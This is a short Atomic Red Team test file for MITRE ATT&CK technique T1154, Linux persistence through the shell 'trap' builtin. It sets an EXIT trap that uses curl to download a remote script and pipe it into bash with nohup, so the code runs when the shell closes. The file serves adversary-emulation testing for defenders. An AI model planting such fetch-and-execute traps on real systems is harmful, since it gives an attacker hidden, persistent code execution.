Files
atomic-red-team/Linux/Persistence/Trap.md
T
2018-02-13 15:10:47 -06:00

301 B

Trap

MITRE ATT&CK Technique: T1154

trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT

exit

After exiting the shell, the script will download and execute.